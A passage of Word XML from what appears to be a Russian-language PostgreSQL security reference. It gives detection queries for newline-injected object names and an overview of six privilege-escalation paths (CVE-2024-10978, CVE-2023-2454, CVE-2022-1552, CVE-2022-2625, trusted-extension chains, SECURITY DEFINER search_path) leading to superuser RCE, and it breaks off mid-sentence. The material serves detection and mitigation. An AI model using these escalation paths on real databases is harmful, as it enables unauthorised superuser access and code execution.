      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SHOW server_version;  -- сервер</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15590B35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- psql --version  -- на host (через shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140F9E6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- objects с newline-в-имени:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363CF7CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT rolname FROM pg_authid WHERE rolname ~ E'[\n\r]';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFACB76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT relname, n.nspname FROM pg_class c JOIN pg_namespace n ON c.relnamespace=n.oid WHERE relname ~ E'[\n\r]';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5C47DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT description FROM pg_description WHERE description ~ E'[\n\r]\\\\!';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523D7C2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Если какой-либо из этих query возвращает строки на production-кластере — немедленный alert; объект-с-payload уже создан.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD14EC5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.13.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C7AA8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege escalation в PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — класс паттернов, позволяющих </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>роли с ограниченными правами получить права более привилегированной роли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (как правило — superuser). Это не финальные RCE: эскалация — ступень, после которой становятся доступны категории 3.7 (RCE через COPY PROGRAM, untrusted languages), 3.6.4 (file r/w через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t>), 3.17 (RLS bypass). Без 3.13 эти векторы недоступны для типичной application-роли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E65B34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Шесть подразделов 3.13 — это шесть разных механик «подъёма». Пять из них якорятся на конкретные CVE (R8 / R12 / R15 / R16 / частично R28), один (3.13.6) описывает классическую mis-configuration без CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D45C963" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Mini-таблица: шесть путей эскалации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6"/>
        <w:gridCol w:w="1783"/>
        <w:gridCol w:w="1674"/>
        <w:gridCol w:w="1696"/>
        <w:gridCol w:w="2781"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="5E83DC09"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94B993B"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4424419" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Вектор</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D3B60DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Минимальная привилегия ДО</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9FF6914" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Получаемая привилегия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66F14F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Финальный RCE в 3.7.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5FA54009"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9D27BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.1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09D7F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SET ROLE / plan-cache (CVE-2024-10978)</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AF3748" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SET ROLE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на хотя бы одну другую роль</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E8BE78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Чтение/запись данных под чужой ролью; обход RLS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DFB811" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3.7.1 (если целевая роль имеет </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_execute_server_program</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="28A35A8D"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968DA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.2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C45D0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>schema_element в CREATE SCHEMA (CVE-2023-2454)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330726" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE на БД (или PUBLIC до PG 15)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A642EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Исполнение функции от admin при обращении к созданной таблице</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625D56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.2a / 3.7.3 (если admin = superuser)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0F8D168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D59071" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.3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1301E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Index expressions + autovacuum (CVE-2022-1552)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3C3C33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE на схеме</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DE6F74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Arbitrary SQL как роль, запустившая ANALYZE (autovacuum → superuser)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66A9CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.1 / 3.7.2a / 3.7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="72E52F77"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A733CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.4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7B4718" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Extension scripts pre-create (CVE-2022-2625)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6334B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE на схеме (public до PG 15)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EA37E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RCE как superuser в момент вызова перехваченной функции</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6EA60E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.1 / 3.7.2a / 3.7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="428DAEFC"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5AD3E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.5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801F83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Trusted extensions chain (R28)</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4588DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE на БД (PG 13+)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A0101A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Установка trusted extension → chain в (а) CVE-2024-10979 (3.7.2b) или (б) R16-style (3.13.4)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9692E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.2b (chain a) / 3.7.X (chain b)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="03F1E1B5"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ECCF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.6</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8919C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SECURITY DEFINER без SET search_path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AE0A02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE на pg_temp (всегда у каждой сессии)</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2C319" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Arbitrary SQL как owner SECURITY DEFINER функции (обычно superuser)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C35DCB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.1 / 3.7.2a / 3.7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="716C8FA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCEFA23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7 (RCE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — куда эскалируют все шесть векторов 3.13. Каждый подраздел 3.13.X указывает, какой именно вектор 3.7.X становится доступен после эскалации. Граница: 3.13 даёт право; 3.7 им пользуется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F0B39" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17 (RLS-обходы)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.13.1 (SET ROLE / CVE-2024-10978) пересекается с 3.17.3, где тот же CVE рассматривается с точки зрения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обхода RLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (а не получения роли). Граница: 3.13.1 — получение чужой роли; 3.17.3 — чтение чужих данных через тот же баг.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683E62F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.3 / 3.6.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это predefined roles, которые часто эскалируются через 3.13.X. Граница: 3.6.3/3.6.4 — что делать с привилегией; 3.13 — как её получить.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C66C491" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 (Mitigations / Принцип наименьших привилегий)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — раздел 5 содержит сводные рекомендации по предотвращению 3.13 на уровне ролей и GRANT-схем; здесь — только специфичные mitigations внутри каждой карточки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8FC2AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Карта подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2C0BB7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SET ROLE / SET SESSION AUTHORIZATION — CVE-2024-10978, multi-tenant plan-cache leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CA2D0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> search_path hijacking + schema_element — CVE-2023-2454, DEFAULT-bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222ED65D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Index expressions + autovacuum/REINDEX — CVE-2022-1552, expression-trap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E27FD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Extension scripts: CREATE OR REPLACE подмена — CVE-2022-2625, ownership-takeover (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVSS 9.8</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014EE440" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trusted extensions как ступень эскалации — R28, два chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A972505" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SECURITY DEFINER + SET search_path — классический mis-configuration без CVE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23740C62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Общая модель угроз</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360BC932" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Все шесть векторов работают по одной из трёх схем:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D32427A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bug в reset/setup пути</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.13.1) — баг сервера, который позволяет данным/коду одной роли просочиться в контекст другой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2D2ED2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trap-объект, исполняемый позже под чужой ролью</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.13.2, 3.13.3, 3.13.4, 3.13.6) — атакующий заранее создаёт объект (DEFAULT-выражение, index expression, функцию в pg_catalog, функцию в pg_temp), который затем триггерится действием более привилегированной роли (admin-запрос, autovacuum, CREATE EXTENSION, вызов SECURITY DEFINER).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C69E25D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chain через дополнительный CVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.13.5) — non-superuser устанавливает trusted extension, дальше эксплуатирует уже </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>другой</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE в этом расширении или в его scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451DECD7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Различие между 1 и 2/3 важно для детекции: схема 1 невидима в коде атакующего (только в seq последовательности запросов); схемы 2 и 3 оставляют артефакты в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это материал для статической детекции в rules.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2813D2E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.13.1 SET ROLE / SET SESSION AUTHORIZATION (CVE-2024-10978)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8E460E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> До PostgreSQL 17.1 (и параллельных minor-фиксов) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
